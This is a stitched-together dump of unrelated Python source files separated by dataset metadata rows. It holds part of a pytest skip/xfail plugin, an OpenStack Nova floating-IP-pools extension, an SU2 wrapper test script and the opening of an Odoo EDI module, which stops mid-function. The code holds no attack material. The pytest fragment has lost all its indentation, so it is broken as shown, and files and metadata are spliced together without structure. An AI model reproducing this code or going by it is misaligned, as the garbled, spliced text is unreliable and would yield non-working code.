if isinstance(expr, py.builtin._basestring):
result = cached_eval(self.item.config, expr, d)
else:
if "reason" not in kwargs:
# XXX better be checked at collection time
msg = "you need to specify reason=STRING " \
"when using booleans as conditions."
pytest.fail(msg)
result = bool(expr)
if result:
self.result = True
self.reason = kwargs.get('reason', None)
self.expr = expr
return self.result
else:
self.result = True
return getattr(self, 'result', False)
def get(self, attr, default=None):
return self.holder.kwargs.get(attr, default)
def getexplanation(self):
expl = getattr(self, 'reason', None) or self.get('reason', None)
if not expl:
if not hasattr(self, 'expr'):
return ""
else:
return "condition: " + str(self.expr)
return expl
@pytest.hookimpl(tryfirst=True)
def pytest_runtest_setup(item):
# Check if skip or skipif are specified as pytest marks
skipif_info = item.keywords.get('skipif')
if isinstance(skipif_info, (MarkInfo, MarkDecorator)):
eval_skipif = MarkEvaluator(item, 'skipif')
if eval_skipif.istrue():
item._evalskip = eval_skipif
pytest.skip(eval_skipif.getexplanation())
skip_info = item.keywords.get('skip')
if isinstance(skip_info, (MarkInfo, MarkDecorator)):
item._evalskip = True
if 'reason' in skip_info.kwargs:
pytest.skip(skip_info.kwargs['reason'])
elif skip_info.args:
pytest.skip(skip_info.args[0])
else:
pytest.skip("unconditional skip")
item._evalxfail = MarkEvaluator(item, 'xfail')
check_xfail_no_run(item)
@pytest.mark.hookwrapper
def pytest_pyfunc_call(pyfuncitem):
check_xfail_no_run(pyfuncitem)
outcome = yield
passed = outcome.excinfo is None
if passed:
check_strict_xfail(pyfuncitem)
def check_xfail_no_run(item):
"""check xfail(run=False)"""
if not item.config.option.runxfail:
evalxfail = item._evalxfail
if evalxfail.istrue():
if not evalxfail.get('run', True):
pytest.xfail("[NOTRUN] " + evalxfail.getexplanation())
def check_strict_xfail(pyfuncitem):
"""check xfail(strict=True) for the given PASSING test"""
evalxfail = pyfuncitem._evalxfail
if evalxfail.istrue():
strict_default = pyfuncitem.config.getini('xfail_strict')
is_strict_xfail = evalxfail.get('strict', strict_default)
if is_strict_xfail:
del pyfuncitem._evalxfail
explanation = evalxfail.getexplanation()
pytest.fail('[XPASS(strict)] ' + explanation, pytrace=False)
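# Editor's sketch (not part of the original plugin): with
#
#     @pytest.mark.xfail(strict=True, reason="not expected to pass yet")
#     def test_unfinished():
#         ...
#
# an unexpected pass becomes a hard failure ("[XPASS(strict)]"); when `strict`
# is omitted, the default is taken from the `xfail_strict` ini option.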
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item, call):
outcome = yield
rep = outcome.get_result()
evalxfail = getattr(item, '_evalxfail', None)
evalskip = getattr(item, '_evalskip', None)
    # unittest special case, see setting of _unexpectedsuccess
if hasattr(item, '_unexpectedsuccess') and rep.when == "call":
# we need to translate into how pytest encodes xpass
rep.wasxfail = "reason: " + repr(item._unexpectedsuccess)
rep.outcome = "failed"
elif item.config.option.runxfail:
        pass # don't interfere
elif call.excinfo and call.excinfo.errisinstance(pytest.xfail.Exception):
rep.wasxfail = "reason: " + call.excinfo.value.msg
rep.outcome = "skipped"
elif evalxfail and not rep.skipped and evalxfail.wasvalid() and \
evalxfail.istrue():
if call.excinfo:
if evalxfail.invalidraise(call.excinfo.value):
rep.outcome = "failed"
else:
rep.outcome = "skipped"
rep.wasxfail = evalxfail.getexplanation()
elif call.when == "call":
rep.outcome = "failed" # xpass outcome
rep.wasxfail = evalxfail.getexplanation()
elif evalskip is not None and rep.skipped and type(rep.longrepr) is tuple:
# skipped by mark.skipif; change the location of the failure
# to point to the item definition, otherwise it will display
        # the location where the skip exception was raised within pytest
filename, line, reason = rep.longrepr
filename, line = item.location[:2]
rep.longrepr = filename, line, reason
# called by terminalreporter progress reporting
def pytest_report_teststatus(report):
if hasattr(report, "wasxfail"):
if report.skipped:
return "xfailed", "x", "xfail"
elif report.failed:
return "xpassed", "X", ("XPASS", {'yellow': True})
# called by the terminalreporter instance/plugin
def pytest_terminal_summary(terminalreporter):
tr = terminalreporter
if not tr.reportchars:
#for name in "xfailed skipped failed xpassed":
# if not tr.stats.get(name, 0):
# tr.write_line("HINT: use '-r' option to see extra "
# "summary info about tests")
# break
return
lines = []
for char in tr.reportchars:
if char == "x":
show_xfailed(terminalreporter, lines)
elif char == "X":
show_xpassed(terminalreporter, lines)
elif char in "fF":
show_simple(terminalreporter, lines, 'failed', "FAIL %s")
elif char in "sS":
show_skipped(terminalreporter, lines)
elif char == "E":
show_simple(terminalreporter, lines, 'error', "ERROR %s")
elif char == 'p':
show_simple(terminalreporter, lines, 'passed', "PASSED %s")
if lines:
tr._tw.sep("=", "short test summary info")
for line in lines:
tr._tw.line(line)
def show_simple(terminalreporter, lines, stat, format):
failed = terminalreporter.stats.get(stat)
if failed:
for rep in failed:
pos = terminalreporter.config.cwd_relative_nodeid(rep.nodeid)
lines.append(format %(pos,))
def show_xfailed(terminalreporter, lines):
xfailed = terminalreporter.stats.get("xfailed")
if xfailed:
for rep in xfailed:
pos = terminalreporter.config.cwd_relative_nodeid(rep.nodeid)
reason = rep.wasxfail
lines.append("XFAIL %s" % (pos,))
if reason:
lines.append(" " + str(reason))
def show_xpassed(terminalreporter, lines):
xpassed = terminalreporter.stats.get("xpassed")
if xpassed:
for rep in xpassed:
pos = terminalreporter.config.cwd_relative_nodeid(rep.nodeid)
reason = rep.wasxfail
lines.append("XPASS %s %s" %(pos, reason))
def cached_eval(config, expr, d):
if not hasattr(config, '_evalcache'):
config._evalcache = {}
try:
return config._evalcache[expr]
except KeyError:
import _pytest._code
exprcode = _pytest._code.compile(expr, mode="eval")
config._evalcache[expr] = x = eval(exprcode, d)
return x
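# Editor's sketch (not part of the original plugin): string conditions are
# compiled and evaluated at most once per config object, e.g.
#
#     cached_eval(config, 'sys.platform.startswith("linux")', {'sys': sys})
#
# stores the boolean result in config._evalcache keyed by the expression text.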
def folded_skips(skipped):
d = {}
for event in skipped:
key = event.longrepr
assert len(key) == 3, (event, key)
d.setdefault(key, []).append(event)
l = []
for key, events in d.items():
l.append((len(events),) + key)
return l
def show_skipped(terminalreporter, lines):
tr = terminalreporter
skipped = tr.stats.get('skipped', [])
if skipped:
#if not tr.hasopt('skipped'):
# tr.write_line(
# "%d skipped tests, specify -rs for more info" %
# len(skipped))
# return
fskips = folded_skips(skipped)
if fskips:
#tr.write_sep("_", "skipped test summary")
for num, fspath, lineno, reason in fskips:
if reason.startswith("Skipped: "):
reason = reason[9:]
lines.append("SKIP [%d] %s:%d: %s" %
(num, fspath, lineno, reason))
| mpl-2.0 | -278,946,424,704,177,280 | 34.99435 | 91 | 0.571574 | false |
mmnelemane/nova | nova/api/openstack/compute/legacy_v2/contrib/floating_ip_pools.py | 79 | 2131 | # Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.openstack import extensions
from nova import network
authorize = extensions.extension_authorizer('compute', 'floating_ip_pools')
def _translate_floating_ip_view(pool_name):
return {
'name': pool_name,
}
def _translate_floating_ip_pools_view(pools):
return {
'floating_ip_pools': [_translate_floating_ip_view(pool_name)
for pool_name in pools]
}
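# Illustrative only: for pools named "public" and "private" the helpers above
# produce {"floating_ip_pools": [{"name": "public"}, {"name": "private"}]},
# which is the dict that index() below returns to the API layer.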
class FloatingIPPoolsController(object):
"""The Floating IP Pool API controller for the OpenStack API."""
def __init__(self):
self.network_api = network.API()
super(FloatingIPPoolsController, self).__init__()
def index(self, req):
"""Return a list of pools."""
context = req.environ['nova.context']
authorize(context)
pools = self.network_api.get_floating_ip_pools(context)
return _translate_floating_ip_pools_view(pools)
class Floating_ip_pools(extensions.ExtensionDescriptor):
"""Floating IPs support."""
name = "FloatingIpPools"
alias = "os-floating-ip-pools"
namespace = ("http://docs.openstack.org/compute/ext/"
"floating_ip_pools/api/v1.1")
updated = "2012-01-04T00:00:00Z"
def get_resources(self):
resources = []
res = extensions.ResourceExtension('os-floating-ip-pools',
FloatingIPPoolsController(),
member_actions={})
resources.append(res)
return resources
| apache-2.0 | 3,354,623,288,483,381,000 | 30.80597 | 78 | 0.652276 | false |
EduardoMolina/SU2 | SU2_PY/package_tests.py | 1 | 9332 | #!/usr/bin/env python
## \file package_tests.py
# \brief _____________.
# \author T. Lukaczyk
# \version 7.0.3 "Blackbird"
#
# SU2 Project Website: https://su2code.github.io
#
# The SU2 Project is maintained by the SU2 Foundation
# (http://su2foundation.org)
#
# Copyright 2012-2020, SU2 Contributors (cf. AUTHORS.md)
#
# SU2 is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# SU2 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with SU2. If not, see <http://www.gnu.org/licenses/>.
# make print(*args) function available in PY2.6+, doesn't work on PY < 2.6
from __future__ import print_function
import os, sys, copy
sys.path.append(os.environ['SU2_RUN'])
import SU2
from collections import OrderedDict
# todo:
# verify command line interface
# commenting
# verify optimization, gradients, flow solutions
# verbosity
# plotting
# verbose redirection
# pyopt optimizers
# needed config options
# OPT_CONSTRAINT
# OPT_OBJECTIVE
# CONSOLE
# OUTPUT_WEIGHT
# FINDIFF_STEP
# DOT_FINDIFF_STEP
# GRADIENT_METHOD= FINITE_DIFFERENCING, CONTINUOUS_ADJOINT, DISCRETE_ADJOINT
# ADAPTATION= DIRECT, ADJOINT
def main():
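    # Each helper below exercises one layer of the SU2 Python wrapper:
    # io* cover config read/write, level0-1 run the solvers (deform, direct,
    # adjoint, gradient projection), level2-3 use SU2.eval func/grad and Design,
    # level4-5 use Project and the SLSQP optimizer, mesh0 runs CFD then SU2_MSH.
    # Uncomment the call for the case to be tested.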
#io0() # working
#io1()
#level0() # working
#level1() # working
#level2() # working
#level3() # working
#level4() # working
#level5() # working
mesh0()
print('DONE!')
def io0():
folder='test_io0'; pull='config_NACA0012.cfg'; link='mesh_NACA0012.su2'
with SU2.io.redirect_folder(folder,pull,link):
config_name = 'config_NACA0012.cfg'
config = SU2.io.Config(filename=config_name)
print(config)
config.ADAPT_CYCLES
config['ADAPT_CYCLES']
config.dump('out.cfg')
konfig = copy.deepcopy(config)
konfig['TASKS'] = ['TEST']
konfig['NUMBER_PART'] = 0
config_diff = config.diff(konfig)
print(config_diff)
wait = 0
def io1():
option = SU2.io.config.MathProblem()
option = 'DIRECT'
wait = 0
def level0():
folder='test_level0'; pull='config_NACA0012.cfg'; link='mesh_NACA0012.su2'
with SU2.io.redirect_folder(folder,pull,link):
# Setup
config_name = 'config_NACA0012.cfg'
config = SU2.io.Config(config_name)
config.EXT_ITER = 9
config.NUMBER_PART = 2
SU2.run.CFD(config)
def level1():
folder='test_level1'; pull='config_NACA0012.cfg'; link='mesh_NACA0012.su2'
with SU2.io.redirect_folder(folder,pull,link):
# Setup
config_name = 'config_NACA0012.cfg'
config = SU2.io.Config(config_name)
config['NUMBER_PART'] = 2
config['EXT_ITER'] = 9
state = SU2.io.State()
# Deformation
dv_new = [0.002]*38
info = SU2.run.deform(config,dv_new)
state.update(info)
# Direct Solution
info = SU2.run.direct(config)
state.update(info)
SU2.io.restart2solution(config,state)
# Adjoint Solution
info = SU2.run.adjoint(config)
state.update(info)
SU2.io.restart2solution(config,state)
# Gradient Projection
info = SU2.run.projection(config)
state.update(info)
print(state)
SU2.io.save_data('state.pkl',state)
data = SU2.io.load_data('state.pkl')
SU2.io.save_data('config.pkl',config)
data = SU2.io.load_data('config.pkl')
wait = 0
def level2():
folder='test_level2'; pull='config_NACA0012.cfg'; link='mesh_NACA0012.su2'
with SU2.io.redirect_folder(folder,pull,link):
# Setup
config_name = 'config_NACA0012.cfg'
config = SU2.io.Config(config_name)
config['NUMBER_PART'] = 2
config['EXT_ITER'] = 9
dv_new = [0.0]*38
#dv_new[10] = 0.05
config.unpack_dvs(dv_new)
state = SU2.io.State()
#with SU2.io.redirect.folder(folder='JOB_001',link='mesh_NACA0012.su2'):
# grad = SU2.eval.grad( 'DRAG', 'FINDIFF', config, state )
with SU2.io.redirect_folder(folder='JOB_001',link='mesh_NACA0012.su2'):
func = SU2.eval.func( 'LIFT', config, state )
grads = SU2.eval.grad( 'LIFT', 'CONTINUOUS_ADJOINT', config, state )
with SU2.io.redirect_folder(folder='JOB_001',link='mesh_NACA0012.su2'):
func = SU2.eval.func( 'DRAG', config, state ) # will not run direct
grads = SU2.eval.grad( 'LIFT', 'CONTINUOUS_ADJOINT', config, state ) # will not run adjoint
grads = SU2.eval.grad( 'DRAG', 'CONTINUOUS_ADJOINT', config, state ) # will run adjoint
wait = 0
def level3():
folder='test_level3'; pull='config_NACA0012.cfg'; link='mesh_NACA0012.su2'
with SU2.io.redirect_folder(folder,pull,link):
# Setup
config_name = 'config_NACA0012.cfg'
config = SU2.io.Config(config_name)
config['NUMBER_PART'] = 2
config['EXT_ITER'] = 9
# initialize design state
state = SU2.io.State()
state.find_files(config)
# start design
design = SU2.eval.Design(config,state)
# run design with dv change
dv_new = [0.0]*38
vals = design.obj_f(dv_new)
vals = design.obj_df(dv_new)
vals = design.con_ceq(dv_new)
vals = design.con_dceq(dv_new)
vals = design.con_cieq(dv_new)
vals = design.con_dcieq(dv_new)
vals = design.func('LIFT')
vals = design.grad('LIFT','CONTINUOUS_ADJOINT')
SU2.io.save_data('design.pkl',design)
data = SU2.io.load_data('design.pkl')
wait = 0
def level4():
folder='test_level4'; pull='config_NACA0012.cfg'; link='mesh_NACA0012.su2'
with SU2.io.redirect_folder(folder,pull,link):
# Setup
config_name = 'config_NACA0012.cfg'
config = SU2.io.Config(config_name)
config['NUMBER_PART'] = 2
config['EXT_ITER'] = 9
config.CONSOLE = 'QUIET'
# initialize design state
state = SU2.io.State()
state.find_files(config)
# initialize project
project = SU2.opt.Project(config,state)
# run project with dv changes
dv_new = [0.0]*38
vals = project.obj_f(dv_new)
vals = project.obj_df(dv_new)
dv_new = [-0.005]*38
vals = project.obj_f(dv_new)
dv_new = [0.0]*38
dv_new[9] = -0.02
vals = project.obj_f(dv_new)
dv_new = [0.005]*38
vals = project.obj_f(dv_new) # will not rerun solutions
SU2.io.save_data('project.pkl',project)
data = SU2.io.load_data('project.pkl')
data = project.data
wait = 0
print("Done!")
def level5():
folder='test_level5'; pull='config_NACA0012.cfg'; link='mesh_NACA0012.su2'
with SU2.io.redirect_folder(folder,pull,link):
# Setup
config_name = 'config_NACA0012.cfg'
config = SU2.io.Config(config_name)
config['NUMBER_PART'] = 2
config['EXT_ITER'] = 9
config['CONSOLE'] = 'CONCISE'
# set optimization problem
obj = {}
obj['DRAG'] = {'SCALE':1.e-2}
cons = {}
cons['EQUALITY'] = {}
cons['INEQUALITY'] = {}
cons['INEQUALITY']['LIFT'] = {'SIGN':'>','VALUE':0.328188,'SCALE':1e-1}
cons['INEQUALITY']['MOMENT_Z'] = {'SIGN':'>','VALUE':0.034068,'SCALE':1e-2}
def_dv = config.DEFINITION_DV
n_dv = sum(def_dv['KIND'])
def_dv['SCALE'] = [1.e0]*n_dv
config.OPT_OBJECTIVE = obj
config.OPT_CONSTRAINT = cons
# initialize design state
state = SU2.io.State()
state.find_files(config)
# initialize project
project = SU2.opt.Project(config,state)
# optimization setup
x0 = [0.0]*n_dv
xb = [] #[[-0.02,0.02]]*n_dv
its = 20
# optimize
SU2.opt.SLSQP(project,x0,xb,its)
wait = 0
def mesh0():
folder='mesh_level0'; pull='config_NACA0012.cfg'; link='mesh_NACA0012.su2'
with SU2.io.redirect_folder(folder,pull,link):
# Setup
config_name = 'config_NACA0012.cfg'
config = SU2.io.Config(config_name)
config.EXT_ITER = 9
config.NUMBER_PART = 2
SU2.run.CFD(config)
SU2.io.restart2solution(config)
SU2.run.MSH(config)
if __name__ == '__main__':
main()
| lgpl-2.1 | 6,661,521,788,380,340,000 | 27.364742 | 103 | 0.561402 | false |
SCSSG/Odoo-SCS | addons/edi/models/edi.py | 277 | 31944 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (c) 2011-2014 OpenERP S.A. <http://openerp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import base64
import hashlib
import simplejson as json
import logging
import re
import time
import urllib2
import openerp
import openerp.release as release
from openerp.osv import osv, fields
from openerp.tools.translate import _
from openerp.tools.safe_eval import safe_eval as eval
_logger = logging.getLogger(__name__)
EXTERNAL_ID_PATTERN = re.compile(r'^([^.:]+)(?::([^.]+))?\.(\S+)$')
EDI_VIEW_WEB_URL = '%s/edi/view?db=%s&token=%s'
EDI_PROTOCOL_VERSION = 1 # arbitrary ever-increasing version number
EDI_GENERATOR = 'Odoo' + release.major_version
EDI_GENERATOR_VERSION = release.version_info
def split_external_id(ext_id):
match = EXTERNAL_ID_PATTERN.match(ext_id)
assert match, \
_("'%s' is an invalid external ID") % (ext_id)
return {'module': match.group(1),
'db_uuid': match.group(2),
'id': match.group(3),
'full': match.group(0)}
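# Illustrative only (made-up values): split_external_id('sale:1f2e3d.res_partner-Ab12Cd')
# returns {'module': 'sale', 'db_uuid': '1f2e3d', 'id': 'res_partner-Ab12Cd',
#          'full': 'sale:1f2e3d.res_partner-Ab12Cd'}; the ':db_uuid' part is optional.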
def safe_unique_id(database_id, model, record_id):
"""Generate a unique string to represent a (database_uuid,model,record_id) pair
without being too long, and with a very low probability of collisions.
"""
msg = "%s-%s-%s-%s" % (time.time(), database_id, model, record_id)
digest = hashlib.sha1(msg).digest()
# fold the sha1 20 bytes digest to 9 bytes
digest = ''.join(chr(ord(x) ^ ord(y)) for (x,y) in zip(digest[:9], digest[9:-2]))
# b64-encode the 9-bytes folded digest to a reasonable 12 chars ASCII ID
digest = base64.urlsafe_b64encode(digest)
return '%s-%s' % (model.replace('.','_'), digest)
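# Illustrative only: safe_unique_id(db_uuid, 'res.partner', 42) yields something
# like 'res_partner-Ab3xYz09Q_Lm': the model name with dots replaced, plus a
# 12-character urlsafe-base64 digest that differs on every call (it hashes time).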
def last_update_for(record):
"""Returns the last update timestamp for the given record,
if available, otherwise False
"""
if record._log_access:
record_log = record.get_metadata()[0]
return record_log.get('write_date') or record_log.get('create_date') or False
return False
class edi(osv.AbstractModel):
_name = 'edi.edi'
_description = 'EDI Subsystem'
def new_edi_token(self, cr, uid, record):
"""Return a new, random unique token to identify this model record,
and to be used as token when exporting it as an EDI document.
:param browse_record record: model record for which a token is needed
"""
db_uuid = self.pool.get('ir.config_parameter').get_param(cr, uid, 'database.uuid')
edi_token = hashlib.sha256('%s-%s-%s-%s' % (time.time(), db_uuid, record._name, record.id)).hexdigest()
return edi_token
def serialize(self, edi_documents):
"""Serialize the given EDI document structures (Python dicts holding EDI data),
using JSON serialization.
:param [dict] edi_documents: list of EDI document structures to serialize
:return: UTF-8 encoded string containing the serialized document
"""
serialized_list = json.dumps(edi_documents)
return serialized_list
def generate_edi(self, cr, uid, records, context=None):
"""Generates a final EDI document containing the EDI serialization
of the given records, which should all be instances of a Model
that has the :meth:`~.edi` mixin. The document is not saved in the
database.
:param list(browse_record) records: records to export as EDI
:return: UTF-8 encoded string containing the serialized records
"""
edi_list = []
for record in records:
record_model = record._model
edi_list += record_model.edi_export(cr, uid, [record], context=context)
return self.serialize(edi_list)
def load_edi(self, cr, uid, edi_documents, context=None):
"""Import the given EDI document structures into the system, using
:meth:`~.import_edi`.
:param edi_documents: list of Python dicts containing the deserialized
version of EDI documents
:return: list of (model, id, action) tuple containing the model and database ID
of all records that were imported in the system, plus a suggested
action definition dict for displaying each document.
"""
ir_module = self.pool.get('ir.module.module')
res = []
for edi_document in edi_documents:
module = edi_document.get('__import_module') or edi_document.get('__module')
assert module, 'a `__module` or `__import_module` attribute is required in each EDI document.'
if module != 'base' and not ir_module.search(cr, uid, [('name','=',module),('state','=','installed')]):
raise osv.except_osv(_('Missing Application.'),
_("The document you are trying to import requires the Odoo `%s` application. "
"You can install it by connecting as the administrator and opening the configuration assistant.")%(module,))
model = edi_document.get('__import_model') or edi_document.get('__model')
assert model, 'a `__model` or `__import_model` attribute is required in each EDI document.'
assert model in self.pool, 'model `%s` cannot be found, despite module `%s` being available - '\
'this EDI document seems invalid or unsupported.' % (model,module)
model_obj = self.pool[model]
record_id = model_obj.edi_import(cr, uid, edi_document, context=context)
record_action = model_obj._edi_record_display_action(cr, uid, record_id, context=context)
res.append((model, record_id, record_action))
return res
def deserialize(self, edi_documents_string):
"""Return deserialized version of the given EDI Document string.
:param str|unicode edi_documents_string: UTF-8 string (or unicode) containing
JSON-serialized EDI document(s)
:return: Python object representing the EDI document(s) (usually a list of dicts)
"""
return json.loads(edi_documents_string)
def import_edi(self, cr, uid, edi_document=None, edi_url=None, context=None):
"""Import a JSON serialized EDI Document string into the system, first retrieving it
from the given ``edi_url`` if provided.
:param str|unicode edi: UTF-8 string or unicode containing JSON-serialized
EDI Document to import. Must not be provided if
``edi_url`` is given.
:param str|unicode edi_url: URL where the EDI document (same format as ``edi``)
may be retrieved, without authentication.
"""
if edi_url:
assert not edi_document, 'edi must not be provided if edi_url is given.'
edi_document = urllib2.urlopen(edi_url).read()
assert edi_document, 'EDI Document is empty!'
edi_documents = self.deserialize(edi_document)
return self.load_edi(cr, uid, edi_documents, context=context)
class EDIMixin(object):
"""Mixin class for Model objects that want be exposed as EDI documents.
Classes that inherit from this mixin class should override the
``edi_import()`` and ``edi_export()`` methods to implement their
specific behavior, based on the primitives provided by this mixin."""
def _edi_requires_attributes(self, attributes, edi):
model_name = edi.get('__imported_model') or edi.get('__model') or self._name
for attribute in attributes:
assert edi.get(attribute),\
'Attribute `%s` is required in %s EDI documents.' % (attribute, model_name)
# private method, not RPC-exposed as it creates ir.model.data entries as
# SUPERUSER based on its parameters
def _edi_external_id(self, cr, uid, record, existing_id=None, existing_module=None,
context=None):
"""Generate/Retrieve unique external ID for ``record``.
Each EDI record and each relationship attribute in it is identified by a
unique external ID, which includes the database's UUID, as a way to
refer to any record within any Odoo instance, without conflict.
For Odoo records that have an existing "External ID" (i.e. an entry in
ir.model.data), the EDI unique identifier for this record will be made of
"%s:%s:%s" % (module, database UUID, ir.model.data ID). The database's
UUID MUST NOT contain a colon characters (this is guaranteed by the
UUID algorithm).
For records that have no existing ir.model.data entry, a new one will be
created during the EDI export. It is recommended that the generated external ID
contains a readable reference to the record model, plus a unique value that
hides the database ID. If ``existing_id`` is provided (because it came from
an import), it will be used instead of generating a new one.
If ``existing_module`` is provided (because it came from
an import), it will be used instead of using local values.
:param browse_record record: any browse_record needing an EDI external ID
:param string existing_id: optional existing external ID value, usually coming
from a just-imported EDI record, to be used instead
of generating a new one
:param string existing_module: optional existing module name, usually in the
format ``module:db_uuid`` and coming from a
just-imported EDI record, to be used instead
of local values
:return: the full unique External ID to use for record
"""
ir_model_data = self.pool.get('ir.model.data')
db_uuid = self.pool.get('ir.config_parameter').get_param(cr, uid, 'database.uuid')
ext_id = record.get_external_id()[record.id]
if not ext_id:
ext_id = existing_id or safe_unique_id(db_uuid, record._name, record.id)
# ID is unique cross-db thanks to db_uuid (already included in existing_module)
module = existing_module or "%s:%s" % (record._original_module, db_uuid)
_logger.debug("%s: Generating new external ID `%s.%s` for %r.", self._name,
module, ext_id, record)
ir_model_data.create(cr, openerp.SUPERUSER_ID,
{'name': ext_id,
'model': record._name,
'module': module,
'res_id': record.id})
else:
module, ext_id = ext_id.split('.')
if not ':' in module:
# this record was not previously EDI-imported
if not module == record._original_module:
# this could happen for data records defined in a module that depends
# on the module that owns the model, e.g. purchase defines
# product.pricelist records.
_logger.debug('Mismatching module: expected %s, got %s, for %s.',
module, record._original_module, record)
# ID is unique cross-db thanks to db_uuid
module = "%s:%s" % (module, db_uuid)
return '%s.%s' % (module, ext_id)
def _edi_record_display_action(self, cr, uid, id, context=None):
"""Returns an appropriate action definition dict for displaying
the record with ID ``rec_id``.
:param int id: database ID of record to display
:return: action definition dict
"""
return {'type': 'ir.actions.act_window',
'view_mode': 'form,tree',
'view_type': 'form',
'res_model': self._name,
'res_id': id}
def edi_metadata(self, cr, uid, records, context=None):
"""Return a list containing the boilerplate EDI structures for
exporting ``records`` as EDI, including
the metadata fields
The metadata fields always include::
{
'__model': 'some.model', # record model
            '__module': 'module',             # required module
'__id': 'module:db-uuid:model.id', # unique global external ID for the record
'__last_update': '2011-01-01 10:00:00', # last update date in UTC!
'__version': 1, # EDI spec version
'__generator' : 'Odoo', # EDI generator
'__generator_version' : [6,1,0], # server version, to check compatibility.
            '__attachments': [],              # optional list of attached files
}
:param list(browse_record) records: records to export
:return: list of dicts containing boilerplate EDI metadata for each record,
at the corresponding index from ``records``.
"""
ir_attachment = self.pool.get('ir.attachment')
results = []
for record in records:
ext_id = self._edi_external_id(cr, uid, record, context=context)
edi_dict = {
'__id': ext_id,
'__last_update': last_update_for(record),
'__model' : record._name,
'__module' : record._original_module,
'__version': EDI_PROTOCOL_VERSION,
'__generator': EDI_GENERATOR,
'__generator_version': EDI_GENERATOR_VERSION,
}
attachment_ids = ir_attachment.search(cr, uid, [('res_model','=', record._name), ('res_id', '=', record.id)])
if attachment_ids:
attachments = []
for attachment in ir_attachment.browse(cr, uid, attachment_ids, context=context):
attachments.append({
'name' : attachment.name,
'content': attachment.datas, # already base64 encoded!
'file_name': attachment.datas_fname,
})
edi_dict.update(__attachments=attachments)
results.append(edi_dict)
return results
def edi_m2o(self, cr, uid, record, context=None):
"""Return a m2o EDI representation for the given record.
The EDI format for a many2one is::
['unique_external_id', 'Document Name']
"""
edi_ext_id = self._edi_external_id(cr, uid, record, context=context)
relation_model = record._model
name = relation_model.name_get(cr, uid, [record.id], context=context)
name = name and name[0][1] or False
return [edi_ext_id, name]
def edi_o2m(self, cr, uid, records, edi_struct=None, context=None):
"""Return a list representing a O2M EDI relationship containing
all the given records, according to the given ``edi_struct``.
This is basically the same as exporting all the record using
:meth:`~.edi_export` with the given ``edi_struct``, and wrapping
the results in a list.
Example::
[ # O2M fields would be a list of dicts, with their
{ '__id': 'module:db-uuid.id', # own __id.
'__last_update': 'iso date', # update date
'name': 'some name',
#...
},
# ...
],
"""
result = []
for record in records:
result += record._model.edi_export(cr, uid, [record], edi_struct=edi_struct, context=context)
return result
def edi_m2m(self, cr, uid, records, context=None):
"""Return a list representing a M2M EDI relationship directed towards
all the given records.
This is basically the same as exporting all the record using
:meth:`~.edi_m2o` and wrapping the results in a list.
Example::
# M2M fields are exported as a list of pairs, like a list of M2O values
[
['module:db-uuid.id1', 'Task 01: bla bla'],
['module:db-uuid.id2', 'Task 02: bla bla']
]
"""
return [self.edi_m2o(cr, uid, r, context=context) for r in records]
def edi_export(self, cr, uid, records, edi_struct=None, context=None):
"""Returns a list of dicts representing EDI documents containing the
records, and matching the given ``edi_struct``, if provided.
:param edi_struct: if provided, edi_struct should be a dictionary
with a skeleton of the fields to export.
Basic fields can have any key as value, but o2m
values should have a sample skeleton dict as value,
to act like a recursive export.
For example, for a res.partner record::
edi_struct: {
'name': True,
'company_id': True,
'address': {
'name': True,
'street': True,
}
}
Any field not specified in the edi_struct will not
be included in the exported data. Fields with no
value (False) will be omitted in the EDI struct.
If edi_struct is omitted, no fields will be exported
"""
if edi_struct is None:
edi_struct = {}
fields_to_export = edi_struct.keys()
results = []
for record in records:
edi_dict = self.edi_metadata(cr, uid, [record], context=context)[0]
for field_name in fields_to_export:
field = self._fields[field_name]
value = getattr(record, field_name)
if not value and value not in ('', 0):
continue
elif field.type == 'many2one':
value = self.edi_m2o(cr, uid, value, context=context)
elif field.type == 'many2many':
value = self.edi_m2m(cr, uid, value, context=context)
elif field.type == 'one2many':
value = self.edi_o2m(cr, uid, value, edi_struct=edi_struct.get(field_name, {}), context=context)
edi_dict[field_name] = value
results.append(edi_dict)
return results
def _edi_get_object_by_name(self, cr, uid, name, model_name, context=None):
model = self.pool[model_name]
search_results = model.name_search(cr, uid, name, operator='=', context=context)
if len(search_results) == 1:
return model.browse(cr, uid, search_results[0][0], context=context)
return False
def _edi_generate_report_attachment(self, cr, uid, record, context=None):
"""Utility method to generate the first PDF-type report declared for the
current model with ``usage`` attribute set to ``default``.
This must be called explicitly by models that need it, usually
at the beginning of ``edi_export``, before the call to ``super()``."""
ir_actions_report = self.pool.get('ir.actions.report.xml')
matching_reports = ir_actions_report.search(cr, uid, [('model','=',self._name),
('report_type','=','pdf'),
('usage','=','default')])
if matching_reports:
report = ir_actions_report.browse(cr, uid, matching_reports[0])
result, format = openerp.report.render_report(cr, uid, [record.id], report.report_name, {'model': self._name}, context=context)
eval_context = {'time': time, 'object': record}
if not report.attachment or not eval(report.attachment, eval_context):
# no auto-saving of report as attachment, need to do it manually
result = base64.b64encode(result)
file_name = record.name_get()[0][1]
file_name = re.sub(r'[^a-zA-Z0-9_-]', '_', file_name)
file_name += ".pdf"
self.pool.get('ir.attachment').create(cr, uid,
{
'name': file_name,
'datas': result,
'datas_fname': file_name,
'res_model': self._name,
